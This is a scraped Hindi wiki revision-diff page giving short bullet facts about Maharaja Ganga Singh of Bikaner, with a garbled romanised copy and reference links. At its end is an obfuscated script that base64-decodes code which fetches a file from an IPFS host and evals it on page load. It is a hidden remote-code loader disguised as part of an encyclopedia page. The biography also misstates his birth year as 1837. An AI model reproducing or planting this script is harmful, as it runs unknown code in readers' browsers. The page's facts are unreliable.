Difference between revisions of "गंगा सिंह"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*महाराजा गंगा सिंह 1837 ई. में हुआ था। *महाराजा गंगा सिं...' के साथ नया पन्ना बनाया)
 
m (Text replace - " सन " to " सन् ")
 
Line 4: Line 4:
 
*1921 ई. में स्थापित हुए चैम्बर ऑफ़ प्रिंस अथवा नरेन्द्र मण्डल के वे प्रथम अध्यक्ष बने तथा इस पद पर 1925 ई. तक रहे।  
 
*1921 ई. में स्थापित हुए चैम्बर ऑफ़ प्रिंस अथवा नरेन्द्र मण्डल के वे प्रथम अध्यक्ष बने तथा इस पद पर 1925 ई. तक रहे।  
 
*प्रथम विश्वयुद्ध में उन्होंने सभी प्रकार से ब्रिटिश सरकार की सहायता की थी।  
 
*प्रथम विश्वयुद्ध में उन्होंने सभी प्रकार से ब्रिटिश सरकार की सहायता की थी।  
*यहां तक कि उन्होंने फ्रांस में स्थित ब्रिटिश सेनापति सन जान फ्रंच के निर्देशन में युद्ध में भाग लिया।  
+
*यहां तक कि उन्होंने फ्रांस में स्थित ब्रिटिश सेनापति सन् जान फ्रंच के निर्देशन में युद्ध में भाग लिया।  
 
*1934 ई. में उनकी मृत्यु हो गई।
 
*1934 ई. में उनकी मृत्यु हो गई।
  

Latest revision as of 14:05, 6 March 2012

  • maharaja ganga sianh 1837 ee. mean hua tha.
  • maharaja ganga sianh rajapootana ki bikaner riyasat ke shasak the.
  • dilli mean 1919-1920 ee. mean hue akhil bharatiy narendr mandal mean ve mahasachiv bane.
  • 1921 ee. mean sthapit hue chaimbar aauf prians athava narendr mandal ke ve pratham adhyaksh bane tatha is pad par 1925 ee. tak rahe.
  • pratham vishvayuddh mean unhoanne sabhi prakar se british sarakar ki sahayata ki thi.
  • yahaan tak ki unhoanne phraans mean sthit british senapati sanh jan phranch ke nirdeshan mean yuddh mean bhag liya.
  • 1934 ee. mean unaki mrityu ho gee.



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

nagori, d aau. es.el. “khand 3”, svatantrata senani kosh (gaandhiyugin), 2011 (hindi), bharatadiskavari pustakalay: gitaanjali prakashan, jayapur, prishth san 125.

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>